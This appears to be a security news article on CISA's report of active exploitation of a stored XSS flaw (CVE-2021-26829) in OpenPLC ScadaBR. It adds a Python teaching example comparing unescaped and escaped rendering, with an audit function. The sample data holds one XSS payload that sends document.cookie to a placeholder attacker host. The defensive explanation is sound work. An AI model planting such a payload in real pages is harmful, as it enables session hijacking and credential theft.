CISA reports active exploitation of Cross-Site Scripting flaw in OpenPLC ScadaBR
Take action: If you are running unpatched OpenPLC ScadaBR, make sure it is isolated from the internet and reachable only from trusted networks. Then schedule the patch promptly: the flaw is four years old, so any instance still unpatched has already waited too long, and it is now being exploited in the wild.
Learn More
CISA reports that a vulnerability in OpenPLC ScadaBR is actively exploited by threat actors targeting industrial control systems.
The flaw is tracked as CVE-2021-26829 (CVSS score 5.4), a stored Cross-Site Scripting (XSS) vulnerability in the system_settings.shtm component of ScadaBR. It was disclosed four years ago, yet unpatched instances remain in use. The vulnerability allows a remote attacker to inject malicious script or HTML through the system settings interface; because the payload is stored, it executes in the browser of any administrator or authenticated user who later views the affected page.
Successful exploitation could allow an attacker to hijack authenticated user sessions, steal credentials, or alter configuration settings within the affected SCADA environment, since the injected script runs with the privileges of whichever user views the page.
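To make the mechanism concrete, here is an added example of the stored-XSS pattern described above, written for this page rather than taken from ScadaBR's code base. It models a settings page that drops a stored value into HTML verbatim (the vulnerable pattern), the same page with output escaping (the fix), and a small audit function you could point at an exported settings store to find values that already contain HTML metacharacters. The setting name, the payload and the settings record are all constructed placeholders, not the actual field or exploit used against ScadaBR.

```python
import html

# Constructed sample: a settings record as an attacker might have saved it
# through a settings form. The payload is a placeholder for illustration only.
ATTACKER_SETTING = {
    "instance_description": (
        '<script>fetch("http://attacker.example/?c=" + document.cookie)</script>'
    ),
}

BENIGN_SETTING = {"instance_description": "Plant 3 HMI"}


def render_settings_unsafe(settings):
    """Illustrative vulnerable pattern: stored values are concatenated into the
    page without escaping, so a stored <script> tag becomes live markup."""
    rows = "".join(
        f"<tr><td>{name}</td><td>{value}</td></tr>"
        for name, value in settings.items()
    )
    return f"<table>{rows}</table>"


def render_settings_safe(settings):
    """Hardened form: every stored value is HTML-escaped at output time, so the
    browser renders the payload as text instead of executing it."""
    rows = "".join(
        f"<tr><td>{html.escape(name)}</td><td>{html.escape(value)}</td></tr>"
        for name, value in settings.items()
    )
    return f"<table>{rows}</table>"


def contains_active_script(page_html):
    """Crude check used here to show the difference: is there an unescaped
    <script tag anywhere in the rendered page?"""
    return "<script" in page_html.lower()


def audit_stored_settings(settings):
    """Return the names of stored settings whose values contain characters
    that HTML escaping would change (&, <, >, quotes). Anything listed
    deserves a manual look: it may be a payload planted before patching."""
    return sorted(
        name for name, value in settings.items()
        if html.escape(value) != value
    )


if __name__ == "__main__":
    print("unsafe page executes script:",
          contains_active_script(render_settings_unsafe(ATTACKER_SETTING)))
    print("safe page executes script:",
          contains_active_script(render_settings_safe(ATTACKER_SETTING)))
    print("suspicious stored settings:", audit_stored_settings(ATTACKER_SETTING))
```

Output escaping is the fix that removes the bug; the audit is a separate, one-off check for payloads that were stored while the system was vulnerable, because patching the rendering code does not clean the database. Neither replaces the vendor patch or the network isolation recommended above.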
Security teams and network administrators are strongly urged to patch the vulnerable ScadaBR component.
CISA has mandated that Federal Civilian Executive Branch (FCEB) agencies remediate CVE-2021-26829 by December 19, 2025.